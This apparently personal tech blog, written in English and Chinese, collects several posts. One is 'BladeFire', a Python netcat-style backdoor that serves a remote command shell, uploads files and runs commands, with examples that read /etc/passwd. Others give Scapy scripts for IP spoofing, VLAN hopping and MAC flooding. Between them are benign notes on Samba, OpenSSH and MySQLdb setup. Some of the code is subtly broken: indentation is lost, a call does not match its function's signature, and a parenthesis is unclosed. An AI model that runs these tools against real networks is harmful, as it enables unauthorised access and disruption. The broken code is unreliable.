BladeFire NC Program

BladeFire Version 0.0.1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
#!/usr/bin/env python
#coding:utf-8

import sys
import socket
import getopt
import threading
import subprocess

# define some global variables
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0

def usage():
print("Blade Fire Tool")
print("")
print("Usage: BladeFire.py -t target_host -p port")
print("-l --listen - listen in [host]:[port] for incoming connections")
print("-e --execute=file_to_run - execute the given file upon receiving a connection")
print("-c --command - initialize a command shell")
print("-u --upload=destination - upon receiving connection upload a file and write to [destination]")
print("")
print("")
print("Examples:")
print("BladeFire.py -t 192.168.0.1 -p 5555 -l -c")
print("BladeFire.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe")
print("BladeFire.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFGHI' | ./BladeFire.py -t 192.168.11.12 -p 135")
sys.exit(0)

def client_sender():
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((target, port))
if len(buffer):
client.send(buffer)

while True:
recv_len = 1
response = ""

while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data

if recv_len < 4096:
break
print(response)

buffer = raw_input("")
buffer += "\n"

client.send(buffer)
except:
print("[*] Exception! Exiting.")
client.close()

def server_loop():
global target

if not len(target):
target = "0.0.0.0"

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)

while True:
client_socket, addr = server.accept()
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()

def run_command(command):
command = command.rstrip()
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"

return output


def client_handler(client_socket):
global upload
global execute
global command

if len(upload_destination):
file_buffer = ""
while True:
data = client_socket.recv(1024)

if not data:
break
else:
file_buffer += data

try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()

client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)

if len(execute):
output = run_command(execute)
client_socket.send(output)

if command:
while True:
client_socket.send("<MBP:#> ")
cmd_buffer = ""

while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
response = run_command(cmd_buffer)
client_socket.send(response)



def main():
global listen
global port
global execute
global command
global upload_destination
global target

if not len(sys.argv[1:]):
usage()

try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:",["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print str(err)
usage()

for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l","--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False,"Unhandled Option"
if not listen and len(target) and port > 0:
buffer = sys.stdin.read()
client_sender(buffer)
if listen:
server_loop()


if __name__ == "__main__":
main()

import Mysqldb error

Can not import Mysqldb

error Like this:
└─(14:11:27)──> python -c “import MySQLdb” ──(一, 725)─┘
Traceback (most recent call last):
File ““, line 1, in
File “/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/MySQLdb/init.py”, line 19, in
import _mysql
ImportError: dlopen(/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/_mysql.so, 2): Library not loaded: libmysqlclient.18.dylib
Referenced from: /Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/_mysql.so
Reason: image not found

how to solve it?

add the following stuff to your .bash_profile
mine is .zshrc

1
export DYLD_LIBRARY_PATH=/usr/local/mysql-5.6.27-osx10.8-x86_64/lib:$DYLD_LIBRARY_PATH

“/usr/local/mysql-5.6.27-osx10.8-x86_64/lib “ is my mysql location on OS X,
replace yours, and you will import the mysqldb successfully.

SocketProgram

1
2
3
4
5
6
7
8
9
10
import socket

def print_machine_info():
host_name = socket.gethostname()
ip_address = socket.gethostbyname(host_name)
print "Host name: %s"%host_name
print "IP address: %s"%ip_address

if __name__ == "__main__":
print_machine_info()

Running this script,we will get the basic info about our machine

1
2
3
4
5
6
7
8
9
10
11
import socket

def get_remote_machine_info():
remote_host = 'www.fuckbaidu.com'
try:
print "IP address: %s"%socket.gethostbyname(remote_host)
except socket.error,err_msg:
print "%s: %s"%(remote_host, err_msg)

if __name__ == "__main__":
get_remote_machine_info()

The Python socket library has utilities to deal with the various
IP address format.Here,we will use two of them:inet_aton() and
inet_ntoa()

1
2
3
4
5
6
7
8
9
10
11
import socket
from binascii import hexlify

def convert_ip4_address():
for ip_addr in ['127.0.0.1','192.168.1.1']:
packed_ip_addr = socket.inet_aton(ip_addr)
unpacked_ip_addr = socket.inet.ntoa(ip_addr)
print "IP address: %s => Packed:%s, Unpacked:%s"%(ip_addr,hexlify(packed_ip_addr), unpacked_ip_addr)

if __name__ == "__main__":
convert_ip4_address()

Samba AIX solutions

SAMBA:

——————————————————————————–


SAMBA CLIENT ALL:

install SAMBA:

bos.cifs_fs.5.3.0.0.I
bos.cifs_fs.rte.5.3.0.62.U

bos.cifs_fs.smit.5.3.0.60.bff

smitty cifs_fs

lscifsmnt
rmcifsmnt -f /smb_mnt
mkcifsmnt -f /mnt -d share1 -h server1 -c user1


smitty cifs_fs:
first it will do in read-only, later have to come back again and set it again
If Share name is like this: \server name\share name, it is enough to write “share name” (\server.. not needed)

[Entry Fields]
  • Pathname of mount point /homes/ftp/Test
    SERVER name [10.10.40.10]
    User Name [SSH01]
    Password []
    Share name [Test] <–what has been shared on the other system
    Mount as a READ-ONLY system [no] <–first it will be read-only, come back again +
    uid [6027083]
    gid [6000116]
    Mode [777]
    Domain to Authenticate against [] <–once on windows I had to set here: ads
    Remount now, add change to /etc/filesystems, [Both]
    or both
    
    /etc/filesystems entry will mount on start [no]
    Mount Type name []

After these the credential file has to be set as well:
smitty cifs_fs -> Credential configuration

/etc/cifs_fs/cifscred file allows future mounting of CIFS shares with stored credentials
lscifscred lists the server or user entries stored in the /etc/cifs_fs/cifscred file (mkcifscred, rmcifscred, chcifscred)


other methods:
/usr/sbin/mkcifsmnt -t rw -f /homes/ftp/29/test -d test -h 10.10.15.24 -c SSG01 -p xyz -u 32292 -g 6000116 -x 777
mount -v cifs -n 10.10.15.24/SSG01/xyz -o uid=32292,gid=200,fmode=775 test /homes/ftp/29/test


Once on Win side had to change something in order to work:
“I have changed something on the server - from “Send NTLMv2 response only. Refuse LM NTLM” to “ Send LM & NTLM - use NTLMv2 session security if negotiated” So I hope, this fixes the problem”

——————————————————————————–


——————————————————————————–


SAMBA SERVER ALL:

Needed ports:

netbios-ns 137/tcp # NETBIOS Name Service
netbios-ns 137/udp # NETBIOS Name Service
netbios-dgm 138/tcp # NETBIOS Datagram Service
netbios-dgm 138/udp # NETBIOS Datagram Service
netbios-ssn 139/tcp # NETBIOS Session Service
netbios-ssn 139/udp # NETBIOS Session Service

microsoft-ds 445/tcp # Microsoft-DS
microsoft-ds 445/udp # Microsoft-DS

netbios is Windows file & printer sharing

Microsoft-DS (Microsoft Directory Services) is a port used for file sharing. It was introduced with Windows 2000 and gives you the possibility to use SMB protocol (stands for Server Message Block, but is also known as Samba) directly over TCP-IP on port 445.

In www.samba.org, written this:
UDP/137 - used by nmbd
UDP/138 - used by nmbd
TCP/139 - used by smbd
TCP/445 - used by smbd

INSTALL:

/mnt/MISC/SAMBA
-rwxrwxrwx 1 root sys 67379200 Jun 28 2005 samba-3.0.4.0.bff

smitty install:
root@aix31: /mnt/MISC/SAMBA # lslpp -l | grep -i samba
freeware.samba.rte 3.0.4.0 COMMITTED Samba Version 3.0.4


SWAT (SAMBA Web Administartion Tool) configuration: (not necessary, only if you want it)
It is a GUI for SAMBA, a web browser is needed for SWAT, and X11 as well.

/etc/services:
swat 901/tcp

/etc/inetd.conf:
swat stream tcp nowait root /usr/local/samba/sbin/swat swat

in browser:

http://localhost:901

SAMBA tools:

install dir: /usr/local/samba

/usr/local/samba/sbin/nmbd <–provides netbios nameserver supports to clients (nameserver for samba)
/usr/local/samba/sbin/smbd <–smb daemon
/usr/local/samba/sbin/smbd -b <–shows configuration infos. i.e.: path for the config file: smbd -b|grep smb.conf
/usr/local/samba/bin/smbstatus <–shows actual sharings and connections
/usr/local/samba/bin/testparm <–test the smb.conf file for any typo
/usr/local/samba/bin/pdbedit -a user123 <–creates users (on AIX I created before)
/usr/local/samba/bin/smbpasswd <–changes pw (-a: add a user who can access the shares from a client)
/usr/local/samba/bin/smbclient <–it is an SMB client program for UNIX machines, it provides an ftp like interface,

to transfer files between a windows 'server' and a unix 'client'

PROCESS OF SAMBA CONFIGURATION:

  1. check ports: a 137,138,139,445 (if needed firewall opening)
    rpcinfo, telnet

  2. check where is smb.conf:
    /usr/local/samba/sbin/smbd -b <–shows version of SAMBA etc.,and the path to smb.conf

  3. edit smb.conf:
    /usr/local/samba/lib/smb.conf (it is a link to /etc/samba/smb.conf)

Create a similar entry:

[samba_share] <–use this name for connection
comment = share test <–anything can be written here
path = /home/samba_share <–path of the dir what we want to share
read only = no
guest ok = yes
read list = user123 <–users who will be able to read it (space separated)
write list = user123 <–users who will be able to write to it (space separated)

Important:
-check owner,rights of the given directory (in the path)
-after chacnging the conf file, daemons have to be restarted in order changes be refreshed


this is good for read only:
[samba_share]
comment = share test
path = /home/samba_share
read only = no

guest ok = yes

3.SAMBA user creation:
/usr/local/samba/bin/smbpasswd -a user123 <– -a: add user as well

Same user has to be created, to what we gave in the conf file

For root we can create one:
/usr/local/samba/bin/smbpasswd -a root
(root passw is needed)

  1. testing smb.conf:
    /usr/local/samba/bin/testparm <–test the smb.conf file for any typo (default conf file)

testing not the default conf file:
/usr/local/samba/bin/testparm /etc/samba/smb.conf

  1. starting daemons:
    /usr/local/samba/sbin/smbd -D <– -D: handling it as daemon (this is the default)
    /usr/local/samba/sbin/nmbd -D

  2. connecting to SAMBA:

LOCALLY (AIX):
/usr/local/samba/bin/smbclient //localhost/samba_share <–samba_share: which has been created in conf file

password is what has been created with smbpasswd for the user
if not root user, than check permissions of the conf file (if needed give read permission)

another way: /usr/local/samba/bin/smbclient -U% -L localhost

REMOTELY (WINDOWS):
(tools->map network drive->choose a drive)
the command: \10.10.101.78\samba_share <–it will map that directory

“Connect using a different username”: If on Windows and AIX users are identical this is not needed.
If user/pw created in SAMBA is different of the actual windows user/pw, then here we can give the SAMBA user/pw.

  1. Checks, tests:
    /usr/local/samba/bin/smbstatus <–shows connections (if we could connect)

/usr/local/samba/bin/smbclient -L 10.10.101.78 <–shows which shares are available on a given host

!!!2 different SAMBA version (rpm and a fileset one) should no be installed at the same time (daemons did not started for me)!!!!

——————————————————————————–


I had this error:
(Samba was installed from rpm and it was started from inetd.)

smbclient -L localhost -U

added interface ip=10.10.10.8 bcast=10.10.35.31 nmask=255.255.255.224
session request to LOCALHOST failed (Call returned zero bytes (EOF)
)
session request to *SMBSERVER failed (Call returned zero bytes (EOF)
)

  1. check samba logs (I turned this on)
    vi /etc/inetd.conf: netbios-ssn stream tcp nowait root /usr/sbin/smbd -l /var/log/samba.log smbd
    refresh -s inetd
    (probably in syslog you can find where it is logging)

  2. cat samba.log

    [2012/10/11 09:20:11, 0] tdb/tdbutil.c:tdb_log(531)
    tdb(/etc/secrets.tdb): rec_free_read bad magic 0x2f73616d at offset=812 <–shows problems with /etc/secrets.tdb
    [2012/10/11 09:20:11, 0] passdb/machine_sid.c:pdb_generate_sam_sid(163)
    pdb_generate_sam_sid: Failed to store generated machine SID.
    [2012/10/11 09:20:11, 0] smbd/server.c:main(793)
    ERROR: Samba cannot create a SAM SID.

  3. stop samba
    vi /etc/inetd.conf -> comment lines smbd, nmbd
    refresh -s inetd

  4. remove /etc/secrets.tdb
    mv /etc/secrets.tdb /etc/secrets.tdb.old

  5. start samba
    vi /etc/inetd.conf -> uncomment smbd, nmbd lines
    refresh -s inetd

  6. test login

    smbclient -L localhost -U

    added interface ip=10.10.10.8 bcast=10.10.35.31 nmask=255.255.255.224
    Password:


I had this “error”:

smbstatus

Samba version 2.2.7

Service uid gid pid machine

Failed to open byte range locking database
ERROR: Failed to initialise locking database
Can’t initialise locking module - exiting

This is not an error after first successful login it will be OK.
I did: smbclient -L localhost -U
After that: smbstatus

Samba version 2.2.7

Service uid gid pid machine

No locked files


IBM AIX 6 install Openssh 7.2p2

我先安装了zlib

zlib 安装的版本是1.2.8,源代码可以从zlib的官网上下载
Zlib
基本的步骤都是解包,然后./configure make && make install

安装Openssh7.2p2

这个步骤稍微复杂,我遇到一个错误,找到问题修改了源代码中几个地方
从openssh包中找到一个叫做sshbuf-getput-basic.c 的C文件
用VI编辑器打开,从代码中将所有va_copy替换成VA_COPY,我们可以使用vi编辑器
快捷键实现批量替换,%s?va_copy?VA_COPY,完成之后在代码宏定义下面加入
下面条件语句.

1
2
3
4
5
6
7
8
9
10
11
#ifndef VA_COPY
# ifdef HAVE_VA_COPY
# define VA_COPY(dest, src) va_copy(dest, src)
# else
# ifdef HAVE___VA_COPY
# define VA_COPY(dest, src) __va_copy(dest, src)
# else
# define VA_COPY(dest, src) (dest) = (src)
# endif
# endif
#endif

全部修改完毕后,进行./configure,然后没有报错就可以进项make && make install

说明

我这边的openssl没有升级,因为之前有安装过openssh所以一些依赖关系存在,还有
C编译器在我这边的AIX6里面是安装的,如果遇到无法gcc需要额外安装gcc编译器

Hope u enjoy!

Update Openssh 7.2p2 on Redhat 5

首先先检查依赖环境

pam-devel openssl-devel zlib-devel krb5-devel

Zlib 1.1.4 or 1.2.1.2 or greater

卸载之前安装的openssl

1
rpm -e `rpm -qa | grep openssl` --allmatches -nodeps

解压我给你们的两个包

tar -xzvf [Packege name]

编译安装OpenSSl

注意参数
注意使用root权限
(1)./config –prefix=/usr –shared
注意,一定要加上–shared选项,否则openssh编译时候会找不到openssl的
library
这部我这边出现了一个make depend报警,忽略即可

(2)安装
make && make install
(3)验证安装是否成功
openssl version -a

编译安装Openssh

1
2
3
4
5
6
7
8
9
10
11
12
1)配置
./configure --prefix=/usr --with-pam
--with-zlib --with-md5-passwords
2)安装
make && make install
(3)检查OpenSSH
ssh -V

注意点:安装的配置文件在/usr/etc/sshd_config
安装完ssh要重新生成一个key 之前保存在其他机器中的key不能使用得先删掉
然后让ssh重新获取!!!
生成key的命令ssh-keygen -t rsa

IP spoofing

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python
#coding:utf-8

'''
IP-Spoofing is the forgery of IP addresses. The source address is not
the IP of the real network device the packet was sent over, but manually
inserted one. Attackers use this technique either to hide the source of
the attack or to circumvent a packet-filter or other security layers like
tcp wrapper that block or accept connections depending on their source ip
address.
'''

import sys
from scapy.all import send, IP, ICMP

if len(sys.argv) < 3:
print sys.argv[0] + " <src_ip> <dst_ip>"
sys.exit(1)

packet = IP(src=sys.argv[1], dst=sys.argv[2]) / ICMP()
answer = send(packet)

if answer:
answer.show()

'''
Source Code Note:
We create an IP packet that is included into an ICMP packet by defining
IP() / ICMP(). This somewaht unusual but handy declaration syntax is made
possible by Scapy by overriding the / operator with the help of the __div__
method.
The IP packet gets the source and destination IP as a parameter. The resulting pa
cket object is dumped on the screen by calling the show() method on it
(show2() would only display layer 2). Afterwards we send it by calling send()
(here too we could use sendp() for layer2). Last but not least if we get any
response packets it is being printed on the screen. Of course we can only
receive a reply if it is sent to our network card. Therefore it could be necessary
to implement a Mitm attack if our host is not connected to the same hub as the target
system. In our case we do not have to care about a Mitm attack,because Scapy inserts
our MAC address as source address and the destination MAC of the destination IP
automatically. Thus we can be sure the reply packet is directly sent back to us.
You can protect against IP spoofing by signing and encrypting all IP packets.
A common case would be the protocols AH or ESP of the IPSec protocol family.

'''

探测网站信息

Identifying the technology used by a website

we need to install builtwith first

1
2
import builtwith
builtwith.parse('http://example.webscrapying.com')

we can get the following information:

{u’javascript-frameworks’: [u’jQuery’, u’Modernizr’, u’jQuery UI’],
u’web-frameworks’: [u’Web2py’, u’Twitter Bootstrap’],
u’programming-languages’: [u’Python’], u’web-servers’: [u’Nginx’]}

This module will take a URL,download and analyze it, and then return
the technologies used by the website.

Finding the owner of a website

You need to install the module named python-whois

pip install python-whois

1
2
import whois
print whois.whois('weibo.com')

print whois.whois(‘weibo.com’)

print whois.whois(‘weibo.com’)
{
“updated_date”: [
“2016-03-20 00:00:00”,
“2016-03-20 14:56:29”
],
“status”: [
“clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited“,
“clientTransferProhibited https://icann.org/epp#clientTransferProhibited“,
“clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
],
“name”: “Beijing Weibo Internet Technology Co.,Ltd”,
“dnssec”: “unsigned”,
“city”: “Bei jing”,
“expiration_date”: [
“2026-03-20 00:00:00”,
“2111-03-20 04:00:00”
],
“zipcode”: “100080”,
“domain_name”: [
“WEIBO.COM”,
“weibo.com”
],
“country”: “CN”,
“whois_server”: “whois.35.com”,
“state”: “Bei jing”,
“registrar”: “35 Technology Co., Ltd.”,
“referral_url”: “http://www.35.com“,
“address”: “Ideal Int’l Plaza, No. 58, West Of North Forth Ring Rd”,
“name_servers”: [
“NS1.SINA.COM.CN”,
“NS2.SINA.COM.CN”,
“NS3.SINA.COM”,
“NS3.SINA.COM.CN”,
“NS4.SINA.COM”,
“NS4.SINA.COM.CN”,
“ns1.sina.com.cn”,
“ns2.sina.com.cn”,
“ns3.sina.com.cn”,
“ns4.sina.com.cn”,
“ns3.sina.com”,
“ns4.sina.com”
],
“org”: “Beijing Weibo Internet Technology Co., Ltd.”,
“creation_date”: [
“1999-03-20 00:00:00”,
“1999-03-20 04:00:00”
],
“emails”: [
“abuse@35.cn”,
“domainname@staff.sina.com.cn”
]
}

VLAN hopping

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python
#coding:utf-8
''
Lets say our computer is connected to VLAN 1 and
wants to ping another one on VLAN 2.
''

from scapy.all import *

packet = Ether(dst="c0:d3:de:ad:be:ef") / Dot1Q(vlan=1) / Dot1Q(vlan=2) /IP(dst="192.168.13.3" / ICMP()

sendp(packet)

'''information

First we set the header includeing our VLAN tag into the packet and afterwards
the one of the destination host. The switch will remove the first tag, than decide
how to react on the packet, seeing the second tag with VLAN id 2 he decides to forward
it to that vlan. On some switches this attack will only be successful if its connected
to other VLAN enabled switches via stacking, because otherwise they use port based VLAN.
'''

MAC-Flooder

brief

Switches like other computers have a limited size of member that’s also true for the table
holding MAC address information used by the switch to remember which MAC is on which port
as well as its internal ARP cache.Sometimes switches react a bit weirdly if their buffers
overflow. This can lead from denial of service up to giving up switching and behaving like
a normal hub. In hub mode the overall higher traffic raise is not the only problem you would
hav thus all connected computers could see the complete traffic without additional actions.
You should test how your switches react on these exceptions and that’s what the next script is
good for.It generates random MAC addresses and sends them to your switch until the buffer is full

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
#!/usr/bin/env python
#coding:utf-8

import sys
from scapy.all import *

packet = Ether(src=RandMAC("*:*:*:*:*:*"),dst=RandMAC("*:*:*:*:*:*")) / \
IP(src=RandIP("*.*.*.*"), dst=RandIP("*.*.*.*")) / \
ICMP()

if len(sys.argv) < 2:
dev = "eth0"
else:
dev = sys.argv[1]

print "Flooding net with random packets on dev " + dev

sendp(packet, iface=dev, loop=1)

Summary

  1. Generate the packet.
  2. use the specific function to send the packet.

:) life is short, so use python!

,